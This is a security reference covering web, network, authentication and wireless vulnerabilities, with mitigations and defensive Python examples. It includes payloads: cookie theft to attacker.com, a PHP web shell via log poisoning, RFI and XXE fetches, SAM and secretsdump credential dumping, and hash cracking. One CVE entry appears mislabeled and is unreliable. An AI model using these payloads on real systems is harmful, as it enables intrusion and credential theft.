
Common Vulnerabilities Reference

Web Vulnerabilities

SQL Injection (SQLi)

Severity: Critical | OWASP: A03:2021

Types:

  • In-band (union, error-based)
  • Blind (boolean, time-based)
  • Stacked queries

Detection:

```bash
# Manual test
' OR '1'='1
" OR "1"="1
' OR 1=1--
' AND 1=2--

# Automated
sqlmap -u "http://target/?id=1" --batch --dbs
```

Exploitation:

```sql
' UNION SELECT NULL--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT username,password FROM users--
'; DROP TABLE users;--
```

Mitigation: Parameterized queries, stored procedures, input validation, least privilege
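Added example (not from this reference): the concatenation pattern that makes the payloads above work, beside the parameterized and type-validated forms. SQLite stands in for any driver that supports placeholders; the table and rows are constructed demo data.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed in-memory demo table; no real data.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # String concatenation: the request value is spliced into the SQL text, so
    # "1 OR 1=1" rewrites the WHERE clause instead of being compared as a value.
    sql = "SELECT username FROM users WHERE id = " + user_id
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn: sqlite3.Connection, user_id) -> list:
    # Placeholder binding: the statement text is fixed and the value travels
    # separately, so "1 OR 1=1" is compared literally and matches no row.
    rows = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]

def lookup_validated(conn: sqlite3.Connection, user_id: str) -> list:
    # Defence in depth: an id must be a positive integer, so reject anything else
    # before it reaches the database, then still bind it as a parameter.
    if not user_id.isdigit():
        raise ValueError(f"invalid id: {user_id!r}")
    return lookup_parameterized(conn, int(user_id))

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1 OR 1=1"))      # every user leaks
    print(lookup_parameterized(db, "1 OR 1=1"))   # nothing
```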


Cross-Site Scripting (XSS)

Severity: High | OWASP: A03:2021

Types:

  • Reflected: URL param reflected in response
  • Stored: Malicious script saved in database
  • DOM-based: Client-side JavaScript modifies DOM

Detection:

```bash
'"><script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
```

Exploitation (Cookie Theft):

```javascript
<script>new Image().src="http://attacker.com/?c="+document.cookie</script>
```

Mitigation: Input validation, output encoding, Content-Security-Policy, HttpOnly cookies


Server-Side Request Forgery (SSRF)

Severity: High | OWASP: A10:2021

Detection:

```bash
http://localhost/
http://127.0.0.1:80/
http://169.254.169.254/latest/meta-data/  # AWS metadata
```

Exploitation:

```bash
# Port scan internal network
http://target/?url=http://10.0.0.5:22
http://target/?url=http://10.0.0.5:3306

# Read local files
http://target/?url=file:///etc/passwd

# Cloud metadata
http://target/?url=http://169.254.169.254/latest/user-data/
```

Mitigation: URL validation, block private IP ranges, disable unnecessary protocols
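Added example (not from this reference) of the three mitigations in one check: allowed schemes only, every resolved address must be public, and the validated addresses are returned so the caller can connect to them rather than re-resolving. `validate_outbound_url` and the `resolver` hook are assumptions for this demo; the host names in the test are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}   # file://, gopher:// and friends are never fetched

def is_public_address(ip) -> bool:
    # Rejects loopback (127.0.0.1, ::1), RFC 1918 / ULA ranges, link-local
    # (which covers the 169.254.169.254 metadata endpoint), multicast, reserved
    # and unspecified (0.0.0.0) addresses.
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def validate_outbound_url(url: str, resolver=socket.getaddrinfo) -> list:
    """Return the public IPs the URL may be fetched from, or raise ValueError."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    host = parsed.hostname
    if not host:
        raise ValueError("URL has no host")
    try:
        addrs = [ipaddress.ip_address(host)]          # literal IPv4 or bracketed IPv6
    except ValueError:
        # Check every address the name maps to; a name that resolves to both a
        # public and an internal address is rejected, not partially trusted.
        addrs = {ipaddress.ip_address(info[4][0]) for info in resolver(host, None)}
    if not addrs:
        raise ValueError(f"{host!r} did not resolve")
    for ip in addrs:
        if not is_public_address(ip):
            raise ValueError(f"{host!r} resolves to non-public address {ip}")
    return sorted(str(ip) for ip in addrs)
```

Connect to one of the returned addresses (sending the original host in the Host header) instead of resolving again, otherwise a DNS rebinding between check and fetch bypasses the check; re-validate every redirect target the same way.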


Local File Inclusion (LFI) / Remote File Inclusion (RFI)

Severity: High | OWASP: A03:2021

LFI Detection:

```bash
../../etc/passwd
..%252f..%252f..%252fetc/passwd
/proc/self/environ
/proc/net/tcp
```

LFI → RCE (Log Poisoning):

```bash
# Inject PHP into Apache log
curl "http://target" -A "<?php system(\$_GET['cmd']); ?>"

# Access via LFI
http://target/page.php?file=../../var/log/apache2/access.log&cmd=whoami
```

RFI Detection:

```bash
# If allow_url_include is ON
http://target/page.php?file=http://attacker.com/shell.txt
```

Mitigation: Disable allow_url_include, whitelist allowed files, realpath() validation
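Added example (not from this reference) of the allowlist and realpath() checks together, including the symlink case a plain prefix comparison misses. `safe_include_path` is assumed; `build_demo_tree` creates a constructed directory layout so the check can be exercised offline.

```python
import os
import tempfile

def safe_include_path(base_dir: str, requested: str, allowlist=None) -> str:
    """Resolve a user-supplied include name to a regular file strictly inside base_dir."""
    if allowlist is not None and requested not in allowlist:
        # Strictest control: only names the application knows it serves are accepted.
        raise PermissionError(f"{requested!r} is not an allowed include")
    base = os.path.realpath(base_dir)
    # realpath() collapses "..", "." and follows symlinks, so a traversal sequence and
    # a symlink pointing out of the tree both surface as a path outside base.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"{requested!r} escapes {base_dir!r}")
    if not os.path.isfile(candidate):
        # Rejects directories and names that do not exist, such as the literal
        # "..%2f..%2fetc/passwd" left after a double-encoded request is decoded once.
        raise FileNotFoundError(f"{requested!r} is not a regular file")
    return candidate

def build_demo_tree() -> tuple:
    # Constructed layout: base/about.html (legitimate) and base/link.html, a symlink
    # to a file outside base, which a string-prefix check on the raw path would accept.
    base = tempfile.mkdtemp(prefix="includes_")
    outside = tempfile.mkdtemp(prefix="outside_")
    with open(os.path.join(base, "about.html"), "w") as fh:
        fh.write("<h1>About</h1>")
    secret = os.path.join(outside, "secret.txt")
    with open(secret, "w") as fh:
        fh.write("not for the web\n")
    os.symlink(secret, os.path.join(base, "link.html"))
    return base, outside
```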


Command Injection

Severity: Critical

Detection:

```bash
; whoami
| whoami
& whoami
&& whoami
|| whoami
$(whoami)
`whoami`
```

Bypass:

```bash
# Space bypass
cat${IFS}/etc/passwd
cat</etc/passwd

# Encoding
echo "test"
echo%20"test"
```

Mitigation: Input validation, whitelist allowed characters, use language APIs instead of system()
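Added example (not from this reference): the shell-string pattern that the metacharacters above exploit, next to the argv form plus a character allowlist. `validate_host`, `ping_argv` and `echo_literal` are names chosen for this demo; `echo_literal` uses a harmless program to show that each payload arrives as plain argument text.

```python
import re
import subprocess

# Allowlist, not a denylist: ';', '|', '&', '$', '`', spaces and "${IFS}" can never
# pass. The leading '-' ban also blocks argument injection (a value such as "-c"
# would otherwise be parsed as an option by the target program).
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9.-]{1,253}$")

def validate_host(value: str) -> str:
    if not HOSTNAME_RE.match(value):
        raise ValueError(f"rejected host value: {value!r}")
    return value

def ping_vulnerable(host: str) -> str:
    # shell=True hands the whole string to /bin/sh, so "10.0.0.5; whoami" runs two
    # commands. Shown only to contrast with ping_argv(); never use this pattern.
    return subprocess.run("ping -c 1 " + host, shell=True,
                          capture_output=True, text=True).stdout

def ping_argv(host: str) -> list:
    # argv form: each element is exactly one argument and no shell parses anything.
    return ["ping", "-c", "1", validate_host(host)]

def echo_literal(user_input: str) -> str:
    # Same argv semantics with a harmless program: the metacharacters reach echo as
    # plain bytes in argv[1] and are simply printed back, not interpreted.
    out = subprocess.run(["echo", user_input], capture_output=True, text=True, check=True)
    return out.stdout.rstrip("\n")
```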


XML External Entity (XXE)

Severity: High | OWASP: A05:2021

Detection:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
```

Blind XXE:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
<foo/>
```

(The parameter entity reference `%xxe;` is only valid inside the DTD, so it sits within the DOCTYPE internal subset.)

Mitigation: Disable XML external entities (libxml2, Java), use JSON where possible
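Added example (not from this reference) of the "disable external entities" mitigation in Python's standard library, in the spirit of defusedxml's DTD refusal: both payloads above need a DOCTYPE to declare their entity, so a pre-scan that aborts on any DTD stops general and parameter entities alike before any resolver runs. `parse_xml_no_dtd` and `DTDForbidden` are names chosen for this demo.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

class DTDForbidden(ValueError):
    """Raised when a document carries a DOCTYPE or an entity declaration."""

def parse_xml_no_dtd(data: str) -> ET.Element:
    # Pre-scan with a bare expat parser whose only job is to abort on a DTD. The
    # handlers fire as soon as "<!DOCTYPE" is seen, before file:// or http:// in an
    # entity's system id could be touched.
    scanner = expat.ParserCreate()

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} rejected (system id: {sysid!r})")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DTDForbidden(f"entity {name!r} rejected")

    scanner.StartDoctypeDeclHandler = forbid_doctype
    scanner.EntityDeclHandler = forbid_entity
    scanner.Parse(data, True)      # raises DTDForbidden (or ExpatError) on bad input
    return ET.fromstring(data)     # no DTD present, safe to build the tree

# Constructed sample inputs for the demo
CLEAN_DOC = "<order><item>widget</item></order>"
CLASSIC_XXE = ('<?xml version="1.0"?>'
               '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
               '<foo>&xxe;</foo>')
BLIND_XXE = ('<?xml version="1.0"?>'
             '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>'
             '<foo/>')
```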


Network Vulnerabilities

EternalBlue (MS17-010)

Severity: Critical | CVE: CVE-2017-0144

Affected: Windows Vista, 7, 8.1, 10, Server 2008-2016

Detection:

```bash
nmap --script=smb-vuln-ms17-010 10.0.0.5
```

Exploitation:

```bash
# Metasploit
use exploit/windows/smb/ms17_010_eternalblue

# Manual
# https://github.com/0x09AL/CVE-2017-0144-Win-7-Code-Execution
```

Mitigation: MS17-010 patch, disable SMBv1, firewall rules


BlueKeep (CVE-2019-0708)

Severity: Critical

Affected: Windows 7, Server 2008 R2, XP

Detection:

```bash
# Note: rdp-vuln-ms12-020 tests the older MS12-020 RDP bug (CVE-2012-0002), not
# CVE-2019-0708; for BlueKeep itself use a dedicated check such as Metasploit's
# auxiliary/scanner/rdp/cve_2019_0708_bluekeep.
nmap -p 3389 --script=rdp-vuln-ms12-020 10.0.0.5
```

Mitigation: MS19-040 patch, enable NLA, firewall restrict RDP


SAM Database Security

Severity: High

NTLM Hashes stored:

```
Username:rid:LM_hash:NTLM_hash:::
```

Dump:

```bash
# Local
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

# Remote (with admin)
python3 secretsdump.py domain/user:pass@target
```

Crack:

```bash
hashcat -m 1000 hashes.txt wordlist.txt
john --format=nt hashes.txt --wordlist=wordlist.txt
```

Mitigation: Enable Secure Boot, BitLocker, restrict registry access


Authentication Vulnerabilities

Kerberoasting

Severity: High

Technique: Request TGS for service account, crack offline

Detection (defensive):

  • Monitor 4769 events (TGS requests) that have no corresponding 4768 (TGT request) for the same account
  • Alert on service account TGS requests from workstations

Mitigation: Strong service account passwords, least privilege, audit SPNs
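Added example (not from this reference) that runs the two detection rules above over a constructed event list: a 4769 with no 4768 for the same account within the TGT lifetime, and a ticket for a service account requested from a workstation subnet. The account names, subnets and `KerbEvent` shape are assumptions for this demo; real events would come from the Security log of every DC.

```python
import ipaddress
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass
class KerbEvent:
    ts: datetime
    event_id: int      # 4768 = TGT requested (AS-REQ), 4769 = service ticket requested (TGS)
    account: str       # requesting user
    service: str       # target service account / SPN (4769 only; "" for 4768)
    client_ip: str

# Constructed environment facts; in practice pull these from AD and the IPAM/CMDB.
SERVICE_ACCOUNTS = {"svc_sql", "svc_web"}
WORKSTATION_NETS = [ipaddress.ip_network("10.10.0.0/16")]
TGT_LIFETIME = timedelta(hours=10)     # default domain TGT lifetime

def detect_kerberoast(events) -> list:
    """Return (account, service, reason) tuples for events matching either rule."""
    last_tgt = {}
    alerts = []
    for e in sorted(events, key=lambda ev: ev.ts):
        if e.event_id == 4768:
            last_tgt[e.account] = e.ts
        elif e.event_id == 4769:
            # Rule 1: TGS request with no TGT request for that account within the TGT
            # lifetime. Only reliable when every DC forwards its log to one place.
            tgt_ts = last_tgt.get(e.account)
            if tgt_ts is None or e.ts - tgt_ts > TGT_LIFETIME:
                alerts.append((e.account, e.service, "4769 without recent 4768"))
            # Rule 2: ticket for a service account requested from a workstation subnet.
            ip = ipaddress.ip_address(e.client_ip)
            if e.service in SERVICE_ACCOUNTS and any(ip in net for net in WORKSTATION_NETS):
                alerts.append((e.account, e.service, "service-account TGS from workstation"))
    return alerts

# Constructed sample log (not real telemetry)
SAMPLE_EVENTS = [
    KerbEvent(datetime(2024, 1, 8, 9, 0), 4768, "alice", "", "10.10.5.23"),
    KerbEvent(datetime(2024, 1, 8, 9, 5), 4769, "alice", "svc_sql", "10.10.5.23"),
    KerbEvent(datetime(2024, 1, 8, 9, 6), 4769, "bob", "svc_web", "10.20.1.9"),
    KerbEvent(datetime(2024, 1, 8, 9, 10), 4769, "alice", "cifs/fileserver", "10.10.5.23"),
]

if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS):
        print(alert)
```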


AS-REP Roasting

Severity: High

Technique: Accounts with Kerberos pre-authentication disabled return an AS-REP that can be captured and cracked offline

Detection: Look for 4768 (AS-REQ) from non-DC sources

Mitigation: Enable Kerberos pre-authentication


Wireless Vulnerabilities

WPA2-PSK Weak Password

Severity: Medium-High

Attack: Capture handshake, brute force offline

Mitigation: Use 16+ character random passphrase, WPA3


Evil Twin

Severity: Medium

Attack: Fake AP intercepts connections, captures credentials

Mitigation: Verify AP MAC, avoid auto-connect to open networks, use HTTPS


Vulnerability Databases

| CVE | Description | Severity |
| --- | --- | --- |
| CVE-2017-0144 | EternalBlue (SMB) | Critical |
| CVE-2019-0708 | BlueKeep (RDP) | Critical |
| CVE-2022-0847 | DirtyPipe (Linux kernel) | High |
| CVE-2021-34527 | PrintNightmare (Windows) | Critical |
| CVE-2021-26855 | ProxyLogon (Exchange) | Critical |
| CVE-2022-30190 | Follina (MSDT) | High |
| CVE-2023-21716 | NTLM Relay (Windows) | High |

Severity Ratings

| Rating | CVSS Score | Example |
| --- | --- | --- |
| Critical | 9.0-10.0 | RCE, complete system compromise |
| High | 7.0-8.9 | Privesc, data exfiltration |
| Medium | 4.0-6.9 | Information disclosure, DoS |
| Low | 0.1-3.9 | Minor information leaks |
